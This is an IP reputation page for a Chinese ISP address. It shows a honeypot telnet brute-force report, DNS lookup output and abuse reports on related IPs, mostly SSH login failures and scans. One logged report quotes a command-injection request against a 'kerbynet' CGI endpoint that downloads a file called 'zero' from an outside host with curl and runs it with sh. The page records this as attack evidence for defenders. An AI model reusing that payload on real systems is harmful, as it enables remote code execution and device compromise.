122.139.22.37 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: China Unicom Jilin Province Network

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	DATE:2019-07-05 03:42:31, IP:122.139.22.37, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc-bis)	2019-07-05 15:38:04

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 122.139.22.37
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62824
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;122.139.22.37.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019070500 1800 900 604800 86400

;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Fri Jul 05 15:37:56 CST 2019
;; MSG SIZE  rcvd: 117

Host info

37.22.139.122.in-addr.arpa domain name pointer 37.22.139.122.adsl-pool.jlccptt.net.cn.

Nslookup info:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
37.22.139.122.in-addr.arpa	name = 37.22.139.122.adsl-pool.jlccptt.net.cn.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
159.65.145.160	attackbotsspam	Trolling for resource vulnerabilities	2020-08-02 20:56:21
222.186.15.62	attackbotsspam	Aug 2 15:30:16 freya sshd[19224]: Disconnected from authenticating user root 222.186.15.62 port 18089 [preauth] ...	2020-08-02 21:34:03
194.26.29.134	attackspam	08/02/2020-08:13:22.382356 194.26.29.134 Protocol: 6 ET SCAN NMAP -sS window 1024	2020-08-02 21:18:58
145.239.82.87	attack	Aug 2 12:44:56 IngegnereFirenze sshd[32492]: User root from 145.239.82.87 not allowed because not listed in AllowUsers ...	2020-08-02 21:21:14
49.232.145.175	attackbotsspam	Aug 2 13:37:49 ns382633 sshd\[1426\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.232.145.175 user=root Aug 2 13:37:50 ns382633 sshd\[1426\]: Failed password for root from 49.232.145.175 port 35624 ssh2 Aug 2 14:09:59 ns382633 sshd\[6799\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.232.145.175 user=root Aug 2 14:10:02 ns382633 sshd\[6799\]: Failed password for root from 49.232.145.175 port 55260 ssh2 Aug 2 14:13:11 ns382633 sshd\[7584\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.232.145.175 user=root	2020-08-02 21:26:25
222.220.157.241	attackspambots	Unauthorised access (Aug 2) SRC=222.220.157.241 LEN=40 TTL=49 ID=32792 TCP DPT=8080 WINDOW=48202 SYN	2020-08-02 21:01:22
74.102.15.6	attackspam	Port Scan detected from 74.102.15.6 (US/United States/New Jersey/Elmwood Park/pool-74-102-15-6.nwrknj.fios.verizon.net). 4 hits in the last 85 seconds	2020-08-02 21:35:01
103.124.147.22	attackbots	webserver:80 [02/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 363 webserver:80 [02/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 363 webserver:80 [02/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 363 webserver:80 [02/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 363 webserver:80 [02/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 403 363 webserver:80 [02/Aug/2020] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action...	2020-08-02 20:59:36
80.214.16.147	attack	Unauthorized IMAP connection attempt	2020-08-02 21:12:55
66.33.212.126	attackbots	[02/Aug/2020:14:13:35 +0200] Web-Request: "GET /wp-login.php", User-Agent: "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2020-08-02 21:04:29
101.78.149.142	attack	Aug 2 14:55:39 eventyay sshd[8242]: Failed password for root from 101.78.149.142 port 45780 ssh2 Aug 2 14:59:07 eventyay sshd[8324]: Failed password for root from 101.78.149.142 port 45912 ssh2 ...	2020-08-02 21:03:43
111.229.61.82	attackspam	Aug 2 14:13:31 rancher-0 sshd[723742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.229.61.82 user=root Aug 2 14:13:33 rancher-0 sshd[723742]: Failed password for root from 111.229.61.82 port 53800 ssh2 ...	2020-08-02 21:06:47
175.176.63.34	attack	20/8/2@08:13:08: FAIL: Alarm-Network address from=175.176.63.34 ...	2020-08-02 21:27:33
51.103.27.114	attackspambots	20 attempts against mh-ssh on wind	2020-08-02 21:02:55
145.239.252.197	attackspam	Aug 2 14:13:21 vps8769 sshd[17991]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=145.239.252.197 Aug 2 14:13:23 vps8769 sshd[17991]: Failed password for invalid user admin from 145.239.252.197 port 47772 ssh2 ...	2020-08-02 21:17:34

Recently Reported IPs

170.200.110.193	194.42.156.87	51.253.35.159	28.137.223.92
46.176.77.241	190.38.215.58	53.209.49.107	109.86.139.33
14.226.224.247	88.205.170.58	51.112.248.63	112.194.106.19
241.101.56.253	66.249.69.208	64.82.150.157	68.103.56.84
59.146.13.255	160.102.201.138	250.82.170.29	191.138.201.0